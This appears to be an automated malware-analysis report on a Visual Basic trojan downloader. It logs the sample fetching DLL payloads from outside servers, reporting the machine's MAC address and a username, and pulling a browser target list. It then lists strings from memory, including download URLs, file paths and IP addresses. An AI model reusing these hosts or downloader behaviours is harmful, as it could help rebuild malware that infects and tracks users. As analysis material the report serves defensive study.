GET /send/InsertWnd_2345title_en.dll HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: yxtt.v138.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 20:18:02 GMT

Content-Length: 157184

Content-Type: application/x-msdownload

Last-Modified: Mon, 18 Jan 2016 07:42:12 GMT

Accept-Ranges: bytes

ETag: "9af64bec351d11:a4e7"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)

Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}|}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a......8..
.8...8....X..8.......8....X..8.......8....X..8...9...8....X..8.......8
....X..8.......8....X..8./.....8.bc123}}}}}}}}}}a2&12.|~}... }}}abc12.
}.\v|q}}..abs123.~}}M{}}.~ab#723}}m}m}}}.}agc023}}}x}|}}}}ab3723m}}}}}
}.}=`bc!23m}}}}m}}m}abc12#}}}.?{}1}}aN!72.}}}}={}Q.}abc123}}}}}}}}}}ar
 72#}}}}}}}}}}abc123}}}}}}}}}}abc123}}}.F{}5}}abc123}}}}}}}}}}abc123}}
}}}}}}}}abc123}}}(-%M}}}ab.223m}}}}}}}y}abc123}}}}}}}.}}.73i.3}}}}..}}
.~ab=323y}}}}}}}}}abc12s}}.S....}}abs123={}}y}}}..abc123}}}}}}}=}}.bc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw...)./..b}72.2.}}.x}[x}.x`1F2A}h...gm.F.|P..
*[email protected].. ..Zi{..Cp...P....x......xk../.U..r....\....._e....l}
O..* N=....].eM.....P2>....;D..)E......>..S..............r.A1C.%
...2.4.jF....u..c)G...K.......Bq...?.$...YO...Sh..k....X1...KB..1..`.4
....i.p....W.p.m...fE.".Tc-......Xw`..vL.oD....T......g..C......Mw..*G
~..8.7ox..w..G...h.._vY\x..D....T.......}.iGb..V.].S.>...5.h.yX....
R...kI...._[X...n....M........`.&...l5&.....y.....J.Z..L.......b<..
.....6D<tM.b$C.;.(..H.....k......E.:..e|....e|D.....;Y...\...{w<<< skipped >>>

GET /ip.asp HTTP/1.1

User-Agent: vb   wininet

Host: VVV.yswm.net


HTTP/1.1 200 OK

Date: Sun, 25 Sep 2016 01:28:29 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 64

Content-Type: text/html

Set-Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA; path=/

Cache-Control: private

X-Cache: MISS from cache.51cdn.com

X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)

Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</scri
pt>HTTP/1.1 200 OK..Date: Sun, 25 Sep 2016 01:28:29 GMT..Server: Mi
crosoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 64..Content-Ty
pe: text/html..Set-Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGC
MA; path=/..Cache-Control: private..X-Cache: MISS from cache.51cdn.com
..X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)..Connection: keep-alive.
.<script>window.location.href='ip.asp?ip=194.242.96.226'</scr
ipt>....


GET /ip.asp HTTP/1.1

User-Agent: RookIE/1.0

Host: VVV.yswm.net

Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA


HTTP/1.1 200 OK

Date: Sun, 25 Sep 2016 01:28:42 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 64

Content-Type: text/html

Cache-Control: private

X-Cache: MISS from cache.51cdn.com

X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)

Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</scri
pt>HTTP/1.1 200 OK..Date: Sun, 25 Sep 2016 01:28:42 GMT..Server: Mi
crosoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 64..Content-Ty
pe: text/html..Cache-Control: private..X-Cache: MISS from cache.51cdn.
com..X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)..Connection: keep-ali
ve..<script>window.location.href='ip.asp?ip=194.242.96.226'</
script>..

GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1

User-Agent: vb   wininet

Host: mactj.v138.net


HTTP/1.1 302 Redirct

Connection: Close

Pragma: no-cache

Location: hXXp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar

Cache-control: no-cache

Content-Type: text/html; charset=UTF-8;

Content-Length: 0;

GET /ic.asp HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 1212.ip138.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Microsoft-IIS/6.0

Connection: keep-alive

Date: Sun, 25 Sep 2016 01:28:56 GMT

Content-Type: text/html

Content-Length: 219

X-Powered-By: ASP.NET

Set-Cookie: ASPSESSIONIDSAQSTTRB=BFEOKIHDPKHNBLGOJOJGPKFB; path=/

X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.226] ............</center></body></htm
l>HTTP/1.1 200 OK..Server: Microsoft-IIS/6.0..Connection: keep-aliv
e..Date: Sun, 25 Sep 2016 01:28:56 GMT..Content-Type: text/html..Conte
nt-Length: 219..X-Powered-By: ASP.NET..Set-Cookie: ASPSESSIONIDSAQSTTR
B=BFEOKIHDPKHNBLGOJOJGPKFB; path=/..X-Daa-Tunnel: hop_count=1..<htm
l>..<head>..<meta http-equiv="content-type" content="text/
html; charset=gb2312">..<title> ....IP.... </title>..&l
t;/head>..<body style="margin:0px"><center>....IP....[1
94.242.96.226] ............</center></body></html>..

GET /osm.dll HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.topyouxi.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 03:39:46 GMT

Content-Length: 84992

Content-Type: application/x-msdownload

Last-Modified: Fri, 20 May 2016 16:37:59 GMT

Accept-Ranges: bytes

ETag: "c1447f8b5b2d11:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)

Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}.}}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a.........
.......s...............................0.RZ....}}}}}}}abc123}}}-8}}1|~
a._.e3}}}}}}}.}s@ib723=|}}m}}}..aB.223..}}}y}}}}pbs123.}}y}}}|}}afc123
}}}}my}}m}abc121}}}}}m}}m}abc!23m}}}}}}m}}a&o52.}}}.vy}.}}abc52.v}}}}}
}}}}abc123}}}.qy}q}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}}}}}abc123}}}}}}}}}}a73i.3}}}}..}}m}abc123y}}}}}}}}}abc12.}}
.(-%L}}}ab#023..}}G|}}y}abc123}}}}}}}=}}.L.B@P}}}}m}}}}yabm123C|}}}}}}
}}abc12s}}.}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc1
23}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw}....N.a..22.S|}}.~}[.}.x`12\....h....sK.J@^
.[c.e`......4..%.p...u..E..?...m....3}?>..q.Pj...."(%[email protected]
w.....>.l.... ;.D...5.6(#@....Q\.`...'8.k......... ......x.$'...v.w
.......r,.{.{H...E.@.&$...*FRi..Sx.....z1.D....n.Y.a.}.......z.G...i..
>[email protected]....^...<.C...7eXI ..\...t..q.S.`C.t.g..n.U...w...
=.9.<'Tt....,..7 ....~..1.:..DS.. u!...OdP.....:.$<.....0.. ....
.q....&.=u..CM.X..i....q. $....L...]L?T...A.$..C.....].x.wt..V.......(
U...a.....2.y..x..u..W.71.........n-...3.(o.t...j(...b...!<...l<<< skipped >>>

GET /newcor.dll HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.topyouxi.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 02:34:10 GMT

Content-Length: 369152

Content-Type: application/x-msdownload

Last-Modified: Wed, 21 Sep 2016 02:32:20 GMT

Accept-Ranges: bytes

ETag: "8c18b360b013d21:a652"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc108:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)

Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}u|}al|.<
;3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a.........
.........JY....`.........PY......(.U.....]Y..............eY...........
...aY...............Y............0.RZ....}}}}}}}abc123}}}-8}}1|~a...e3
}}}}}}}.}.@ib;23.x}}m}}}-ea".,23.e}}}c}}}}qbs123.}}x}|}}}}agc023}}}}mc
}}m}abc121}=|}}m}}m}abc!23m}}}}}}m}}a^d/2.}}}.~c}=~}abc/2.~}}}}}}}}}ab
c123}}}.zc}e}}abc123}}}}}}}}}}abc123}}}}}}}}}}aB.,2{}}}}}}}}}}abc123}}
}}}}}}}}abc123}}}}}}}}}}a73i.3}}}}-e}}m}abc123y}}}}}}}}}abc12.}}.(-%L}
}}ab.423.e}}.x}}y}abc123}}}}}}}=}}.L.B@P}}}}m}}}}cabk123.x}}}}}}}}abc1
2s}}.}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}
}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}
abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123
}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}
}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}ab
c123}}}}}}NSMHa73i.>tsw..2.yL....,2..x}}E`}[n}dx`1..7{..>D.W....
.......>;Q.t .:.\..".....1?.......0.X.er.'5_...p.T3..U8.......P.,.l
...N..o...P..3.....v......_W.B.....U...u..QK....pGp..1*<.S..]0..h..
.......Q|.8...?......JP..%[email protected].._. .j'..A....M..
..o_a..i....r.. .A...|!.g#.w.T.=.J.2-. ..;..../...%......"z.n..].=....
i......w... C6@.._hiW..w..Y...k....MS...ti.!.l.PI.......f.O...m.....Uo
w..fp...~>.....^8......&... }...c. _.....Q....~..5~....tWg..&U..:.n
x...(g;D....S.R.%7..=..aN.c'........w.}.?....Bl./(.}....^....2&...<<< skipped >>>

GET /homepro.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.topyouxi.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 03:41:19 GMT

Content-Length: 161

Content-Type: text/plain

Last-Modified: Tue, 22 Mar 2016 02:07:56 GMT

Accept-Ranges: bytes

ETag: "ecd3da6df83d11:a4e7"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc108:0 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)

Connection: keep-alive
[email protected]@[email protected]@liebao.exe@sogouexplo
[email protected]@[email protected]@krbrowser.exe@max
[email protected]/1.1 200 OK..Date: Sat, 24 Sep 2016 03:41:19 
GMT..Content-Length: 161..Content-Type: text/plain..Last-Modified: Tue
, 22 Mar 2016 02:07:56 GMT..Accept-Ranges: bytes..ETag: "ecd3da6df83d1
1:a4e7"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-C
ache: HIT from cache.51cdn.com..X-Via: 1.1 jsyc108:0 (Cdn Cache Server
 V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)..Connection: keep-alive
[email protected]@[email protected]@liebao.exe@sogouexp
[email protected]@[email protected]@krbrowser.exe@m
[email protected]....


GET /urlRemote.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.topyouxi.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 Sep 2016 01:38:17 GMT

Content-Length: 100

Content-Type: text/plain

Last-Modified: Mon, 01 Aug 2016 06:38:16 GMT

Accept-Ranges: bytes

ETag: "48361949bfebd11:a4f3"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 1

X-Cache: HIT from cache.51cdn.com

X-Via: 1.1 jsyc108:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)

Connection: keep-alive
[Config]..count=1..[url1]..name=url1..url=cpro.baidustatic.com/aj/stat
ic/sync.html?t=1469895477099..HTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 
01:38:17 GMT..Content-Length: 100..Content-Type: text/plain..Last-Modi
fied: Mon, 01 Aug 2016 06:38:16 GMT..Accept-Ranges: bytes..ETag: "4836
1949bfebd11:a4f3"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..A
ge: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jsyc108:6 (Cdn Ca
che Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)..Connection: 
keep-alive..[Config]..count=1..[url1]..name=url1..url=cpro.baidustatic
.com/aj/static/sync.html?t=1469895477099....

GET /mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar HTTP/1.1

User-Agent: vb   wininet

Host: mactj.v138.net

Connection: Keep-Alive


HTTP/1.1 302 Redirct

Connection: Close

Pragma: no-cache

Location: hXXp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian

Cache-control: no-cache

Content-Type: text/html; charset=UTF-8;

Content-Length: 0;

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_516:

`.rsrc

).ri#

}8!"###"!

!oOZ

vb6chs.dll

RunExeModel

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

D:\drivers\

\olelib.tlb

DeleteUrlCacheEntryA

F%System%\stdole2.tlb

epldrive.dll

mksparse.dll

DiskVolume.dll

oleaut32.dll

shell32.dll

winmm.dll

CreatePipe

ntdll.dll

%System%\msvbvm60.dll\3

VBA6.DLL

URLMON.DLL

URLDownloadToFileA

.text

`.data

.rsrc

.reloc

MSWNSK98.chm

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

MSWINSCK.OCX

"255.255.255.255

"6.00.8169

WSOCK32.dll

KERNEL32.dll

USER32.dll

ole32.dll

ADVAPI32.dll

OLEAUT32.dll

GDI32.dll

GetProcessHeap

GetWindowsDirectoryA

GetKeyState

CreateDialogIndirectParamA

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyA

GetViewportExtEx

SetViewportExtEx

SetViewportOrgEx

"%s%s.DLL

%s%s.DLL

%u\%s.dll

{lX-X-X-XX-XXXXXX}

CLSID\%s

%s Object

%s.%s.%ld

%s.%s

%s.%s\CurVer

%s\InprocServer

VERSION.DLL

%ld - %s

stdole2.tlbWWW

hsckTCPProtocolWW

FsckUDPProtocolWWd

}|RemotePortWWd

7LocalPortWWWd

0ZBsckGetNotSupportedWW

sckSetNotSupportedWW

sckUnsupportedWW

sckMsgTooBig

sckPortNotSupportedW

MSWinSck.OcxWW

MSWNSK98.chmWW

TCP protocolWW

UDP protocolWW

Returns/Sets the port to be connected to on the remote computerWWW0

Returns/Sets the port used on the local computerWW*

Binds socket to specific port and adapterW:

Occurs connect operation is completedW4

Occurs after a send operation has completedWWW

The argument passed to a function was not in the correct format or in the specified rangeW

Unsupported variant typesW"

Invalid operation at current state

The operation is canceledW

Socket is non-blocking and the specified operation will blockW

A blocking winsock operation is in progressWWWA

The operation is completed. No blocking operation is in progress.W

The specified port is not supportedWWW

?$?0?6?<?

4'484%5-5

mswinsck.dbg

=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0<

'hXXps://VVV.verisign.com/repository/CPS

This certificate incorporates by reference, and its use is strictly

subject to, the VeriSign Certification Practice Statement (CPS)

hXXps://VVV.verisign.com; by E-mail at [email protected]; or

USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN

WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE

VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY

DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES

BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE

4hXXps://VVV.verisign.com/repository/verisignlogo.gif0

hXXps://VVV.verisign.com/CPS0b

hXXp://VVV.microsoft.com/vbasic 0

Bo.pS

|%F~":

J.wxn

kEyH

9/}Cmd

UrlW

DownUrlW

BakUrlWW

KERNEL32.DLL

MSVBVM60.DLL

USER32.DLL

P2P.dll

\notepad.vbp

hXXp://VVV.pc918.net/file.txt

hXXp://VVV.yswm.net/file.txt

hXXp://VVV.v138.net/file.txt

hXXp://VVV.v345.net/file.txt

hXXp://VVV.ahwm.net/file.txt

~DFA1039.tmp

\Set.dat

\win.ini

\sys.dat

\system32\mswinsck.ocx

\set.ini

hXXp://user.yswm.net/yswm/

hXXp://user.yswm.net/so118/

hide.exe

\system32\svchost.exe

DownUrl

yswm.runsoft

eWindowStyle

Hotkey

\Addico.ico

The specified file is either a named or anonymous pipe

WScript.Shell

2c49f800-c2dd-11cf-9ad6-0080c7e7b78d

RemotePort

LocalPort

YThe argument passed to a function was not in the correct format or in the specified range

6.00.8169

is a registered trademark of Microsoft Corporation. Windows(tm) is a trademark of Microsoft Corporation.

&LocalPort

Socket has encountered an error:Returns/Sets the name used to identify the remote computer?Returns/Sets the port to be connected to on the remote computer0Returns/Sets the port used on the local computer*Returns the state of the socket connection7Returns the number of bytes received on this connection

TCP protocol

UDP protocol

Error occurred;Occurs when data has been received from the remote computer%Occurs connect operation is completed4Occurs when a remote client is attempting to connect*Occurs when the connection has been closed%Occurs during process of sending data Occurs after a send operation has completed

Protocol Constants)Binds socket to specific port and adapter

Unsupported variant types

"Invalid operation at current state

Invalid type for %s property,%s property should be in the range %ld - %ld

The operation is canceled

=Socket is non-blocking and the specified operation will block A blocking winsock operation is in progressAThe operation is completed. No blocking operation is in progress.

Destination address is requiredAThe datagram is too large to fit into the buffer and is truncated3The specified port is the wrong type of this socket

Option unknown, or unsupported#The specified port is not supported0Socket type not supported in this address family>Socket is not a type that supports connection oriented service

Protocol family not supported

Address Family is not supported

Network subsystem is unavailable WINSOCK.DLL version out of range"WinsockInit should be called first

%original file name%.exe_516_rwx_00401000_00038000:

}8!"###"!

!oOZ

vb6chs.dll

RunExeModel

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

D:\drivers\

\olelib.tlb

DeleteUrlCacheEntryA

F%System%\stdole2.tlb

epldrive.dll

mksparse.dll

DiskVolume.dll

oleaut32.dll

shell32.dll

winmm.dll

CreatePipe

ntdll.dll

%System%\msvbvm60.dll\3

VBA6.DLL

URLMON.DLL

URLDownloadToFileA

.text

`.data

.rsrc

.reloc

MSWNSK98.chm

hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

MSWINSCK.OCX

"255.255.255.255

"6.00.8169

WSOCK32.dll

KERNEL32.dll

USER32.dll

ole32.dll

ADVAPI32.dll

OLEAUT32.dll

GDI32.dll

GetProcessHeap

GetWindowsDirectoryA

GetKeyState

CreateDialogIndirectParamA

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyA

GetViewportExtEx

SetViewportExtEx

SetViewportOrgEx

"%s%s.DLL

%s%s.DLL

%u\%s.dll

{lX-X-X-XX-XXXXXX}

CLSID\%s

%s Object

%s.%s.%ld

%s.%s

%s.%s\CurVer

%s\InprocServer

VERSION.DLL

%ld - %s

stdole2.tlbWWW

hsckTCPProtocolWW

FsckUDPProtocolWWd

}|RemotePortWWd

7LocalPortWWWd

0ZBsckGetNotSupportedWW

sckSetNotSupportedWW

sckUnsupportedWW

sckMsgTooBig

sckPortNotSupportedW

MSWinSck.OcxWW

MSWNSK98.chmWW

TCP protocolWW

UDP protocolWW

Returns/Sets the port to be connected to on the remote computerWWW0

Returns/Sets the port used on the local computerWW*

Binds socket to specific port and adapterW:

Occurs connect operation is completedW4

Occurs after a send operation has completedWWW

The argument passed to a function was not in the correct format or in the specified rangeW

Unsupported variant typesW"

Invalid operation at current state

The operation is canceledW

Socket is non-blocking and the specified operation will blockW

A blocking winsock operation is in progressWWWA

The operation is completed. No blocking operation is in progress.W

The specified port is not supportedWWW

?$?0?6?<?

4'484%5-5

mswinsck.dbg

=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0<

'hXXps://VVV.verisign.com/repository/CPS

This certificate incorporates by reference, and its use is strictly

subject to, the VeriSign Certification Practice Statement (CPS)

hXXps://VVV.verisign.com; by E-mail at [email protected]; or

USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN

WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE

VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY

DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES

BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE

4hXXps://VVV.verisign.com/repository/verisignlogo.gif0

hXXps://VVV.verisign.com/CPS0b

hXXp://VVV.microsoft.com/vbasic 0

Bo.pS

|%F~":

J.wxn

kEyH

9/}Cmd

UrlW

DownUrlW

BakUrlWW

KERNEL32.DLL

MSVBVM60.DLL

USER32.DLL

P2P.dll

\notepad.vbp

hXXp://VVV.pc918.net/file.txt

hXXp://VVV.yswm.net/file.txt

hXXp://VVV.v138.net/file.txt

hXXp://VVV.v345.net/file.txt

hXXp://VVV.ahwm.net/file.txt

~DFA1039.tmp

\Set.dat

\win.ini

\sys.dat

\system32\mswinsck.ocx

\set.ini

hXXp://user.yswm.net/yswm/

hXXp://user.yswm.net/so118/

hide.exe

\system32\svchost.exe

DownUrl

yswm.runsoft

eWindowStyle

Hotkey

\Addico.ico

The specified file is either a named or anonymous pipe

WScript.Shell

2c49f800-c2dd-11cf-9ad6-0080c7e7b78d

RemotePort

LocalPort

YThe argument passed to a function was not in the correct format or in the specified range

6.00.8169

is a registered trademark of Microsoft Corporation. Windows(tm) is a trademark of Microsoft Corporation.

&LocalPort

Socket has encountered an error:Returns/Sets the name used to identify the remote computer?Returns/Sets the port to be connected to on the remote computer0Returns/Sets the port used on the local computer*Returns the state of the socket connection7Returns the number of bytes received on this connection

TCP protocol

UDP protocol

Error occurred;Occurs when data has been received from the remote computer%Occurs connect operation is completed4Occurs when a remote client is attempting to connect*Occurs when the connection has been closed%Occurs during process of sending data Occurs after a send operation has completed

Protocol Constants)Binds socket to specific port and adapter

Unsupported variant types

"Invalid operation at current state

Invalid type for %s property,%s property should be in the range %ld - %ld

The operation is canceled

=Socket is non-blocking and the specified operation will block A blocking winsock operation is in progressAThe operation is completed. No blocking operation is in progress.

Destination address is requiredAThe datagram is too large to fit into the buffer and is truncated3The specified port is the wrong type of this socket

Option unknown, or unsupported#The specified port is not supported0Socket type not supported in this address family>Socket is not a type that supports connection oriented service

Protocol family not supported

Address Family is not supported

Network subsystem is unavailable WINSOCK.DLL version out of range"WinsockInit should be called first

%original file name%.exe_516_rwx_018C1000_0003E000:

VB5!6&vb6chs.dll

GetWebSoure

%System%\msvbvm60.dll\3

epldrive.dll

mksparse.dll

DiskVolume.dll

urlmon

URLDownloadToFileA

oleaut32.dll

shell32.dll

psapi.dll

CreatePipe

WSOCK32.DLL

wininet.dll

InternetOpenUrlA

DeleteUrlCacheEntryA

kernel32.dll

VBA6.DLL

advapi32.dll

RegOpenKeyA

RegOpenKeyExA

RegCloseKey

RegCreateKeyA

RegDeleteKeyA

RegEnumKeyExA

RegEnumKeyA

ntdll.dll

.rsrc

t(>.TO8

GetUrlSourceoP

C:\Program Fi(

6.OLB>

artxKeyA

<URLwn

A6.DLLc ,

WINDOWS\s

.vm60

O.text

stdole2.tlbWWW

KERNEL32.DLL

MSVBVM60.DLL

1.dll

E.PSw$

vb6chs.dll*

C:\Prog

6.OLBWp

A6.DLL

}x.jIE?b

F.lh*(

.KQRy>*f

Z%fs#r&

.Fy/* n>

URLW

yslm.dll

.text

.data

612121212121

vb6chs.dll

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

`.data

202.110.75.114

123.7.177.250

218.28.55.126

218.29.109.10

182.116.61.212

222.89.153.117

125.45.53.136

61.136.66.242

218.28.65.92

222.88.151.61

123.7.38.10

218.29.130.250

125.46.5.166

123.7.88.173

123.7.18.94

61.53.65.4

218.28.242.42

123.13.205.77

123.15.36.122

125.40.237.163

218.28.238.10

61.163.32.75

61.136.64.142

218.28.164.138

61.136.66.22

61.163.37.3

218.28.138.22

218.28.62.50

182.116.63.77

218.28.5.202

218.28.139.242

61.136.99.70

222.88.196.183

61.54.227.67

218.29.217.170

218.29.153.198

222.88.253.140

218.29.124.34

221.13.204.30

222.88.154.130

219.150.136.82

218.28.224.122

221.13.206.210

221.13.207.106

125.46.21.214

61.163.178.181

218.28.51.122

219.156.157.89

125.46.76.187

218.29.230.10

218.29.56.103

125.46.93.210

123.7.63.67

125.46.23.186

218.28.57.150

123.7.14.96

61.163.180.50

222.89.156.215

218.28.8.90

218.29.162.30

218.28.5.42

218.29.170.62

61.158.175.71

123.13.226.106

218.29.230.50

125.45.61.235

218.29.5.177

218.28.87.201

218.28.23.210

218.28.78.91

221.13.138.218

221.13.153.158

218.28.108.225

123.15.46.2

125.46.15.2

218.28.167.148

219.156.168.48

61.163.180.55

218.28.165.242

202.110.67.50

222.141.69.25

123.7.118.198

182.116.57.9

123.15.5.150

218.28.143.3

61.136.115.247

61.136.115.234

222.89.46.82

222.88.189.118

222.140.93.130

61.163.38.45

218.28.172.43

218.28.124.252

61.136.99.218

222.88.195.41

219.150.127.8

61.163.32.11

222.88.162.146

218.28.170.242

123.15.46.162

125.40.237.198

61.163.37.1

218.29.133.210

125.46.15.146

221.14.18.213

218.29.69.162

218.28.78.229

61.53.64.107

218.28.138.211

219.156.138.66

61.163.36.5

222.88.222.166

218.28.30.234

222.140.93.90

222.88.107.130

219.154.133.18

218.29.220.242

61.136.64.62

218.28.254.66

42.228.0.138

218.28.111.70

218.28.53.246

61.54.213.39

218.28.114.170

123.7.63.221

